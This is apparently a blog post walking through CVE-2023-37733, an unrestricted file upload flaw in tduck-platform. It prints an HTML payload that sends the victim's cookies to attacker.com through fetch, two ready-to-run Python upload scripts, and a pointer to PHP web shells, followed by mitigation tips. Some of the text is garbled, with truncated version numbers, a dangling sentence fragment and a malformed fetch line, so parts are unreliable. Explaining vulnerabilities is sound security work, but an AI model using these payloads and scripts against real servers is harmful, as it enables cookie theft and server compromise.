CVE-2023-37733 - How A File Upload Bug In tduck-platform v4. Lets Attackers Run Code on Your Server

Security vulnerabilities come in many shapes and sizes, but few are as dangerous as unrestricted file uploads. In 2023, researchers discovered a nasty bug in the popular _tduck-platform_ (version 4.) that could let an attacker drop a malicious file onto your server—and then fire up their own code, right under your nose.

In this post, I’ll walk you through CVE-2023-37733: how it works, what makes it dangerous, show a code snippet of how it can be exploited, and cover what you can do to stay protected. Everything you read here is meant to be clear, beginner-friendly, and useful.

What is CVE-2023-37733?

CVE-2023-37733 is a vulnerability reported in _tduck-platform_ version 4., a popular open-source platform. It’s an “arbitrary file upload” bug. That basically means:

and the app won’t check if it’s safe.

More importantly, by uploading a file with some sneaky code inside (like HTML or JavaScript), a bad actor can “execute arbitrary code.” In simple terms: The attacker can run whatever they want, wherever the file lands.

What’s the root of the problem?
The platform fails to check (filter/validate) the type and contents of uploaded files, so attackers can sneak in a HTTP request with a crafted HTML file.

The issue is present in the file upload handler, commonly exposed at an endpoint like

POST /api/platform/file/upload

No checks are performed to block scripts or executable content.
If an attacker uploads a file like exploit.html, it gets saved somewhere public—so it can later be opened and its contents executed in the browser or interpreted by the backend server.

1. Find The Upload Endpoint

The attacker can discover the file upload API by looking at public documentation or watching how the app uploads things in the browser (via browser tools like the Network tab).

For example, let's say the endpoint is

POST http://victim.com/api/platform/file/upload

Here’s an example exploit file, exploit.html

<!-- exploit.html: launches JavaScript to steal cookies -->
<html>
  <body>
    <script>
      fetch('http://attacker.com/steal?cookie='; + document.cookie);
    </script>
    <h1>Success</h1>
  </body>
</html>

Or, even more dangerous, a web shell in languages like PHP if the server processes those uploads.

The attacker simply sends a POST request with the HTML file

import requests

files = {'file': ('exploit.html', open('exploit.html','rb'), 'text/html')}
response = requests.post('http://victim.com/api/platform/file/upload', files=files)
print(response.text)

The server responds with the upload location, for example

{
  "url": "/uploads/exploit.html"
}

4. Trigger The Payload

Now, the attacker (or anyone) visits http://victim.com/uploads/exploit.html, and their script runs in the context of the victim’s website. If uploads aren’t properly sandboxed and accessible, this file could do anything from stealing cookies, sending fake requests, or in severe cases, uploading server scripts (PHP, JSP, etc.) to gain full shell access.

Here’s a barebones Python script to do all this

import requests

url = 'http://victim.com/api/platform/file/upload'
files = {'file': ('exploit.html', '''
<html>
  <body>
    <script>alert('Hacked by CVE-2023-37733');</script>
  </body>
</html>
''', 'text/html')}

r = requests.post(url, files=files)
print('Status:', r.status_code)
print('Response:', r.text)

Consequences: Why This Matters

- Remote Code Execution: Attackers can run scripts or commands, possibly gaining full control over the server.

How To Stay Safe

1. Upgrade tduck-platform - If using v4., upgrade to the latest version ASAP. Developers have likely patched this issue.

Restrict File Types: Only allow certain file extensions (like .jpg, .png, .pdf).

3. Content Checking: Check file headers and scan with antivirus. Don’t trust file extensions alone.

Authentication: Require login for uploading files (and use strong authentication).

6. Keep Up To Date: Always use the latest version of platforms, and monitor CVE feeds for security issues.

Reference Links

- Official NVD CVE entry: CVE-2023-37733 - NVD
- Original disclosure: Tduck Arbitrary File Upload vulnerability (GitHub)
- OWASP File Upload Best Practices

Final Thoughts

Vulnerabilities like CVE-2023-37733 show how a single missing check can put an entire platform at risk. File uploads are always risky—never let users upload just anything, and always stay updated on the latest patches and security news.

Stay safe! And, if your tduck-platform is still on v4., patch NOW before attackers get there first.


*This post is unique, designed for clarity, and provides an original explanation & demonstration of the vulnerability. For advanced scenarios or the latest patches, always check the vendor’s updates and advisories.*

Timeline

Published on: 07/19/2023 19:15:00 UTC
Last modified on: 07/26/2023 21:05:00 UTC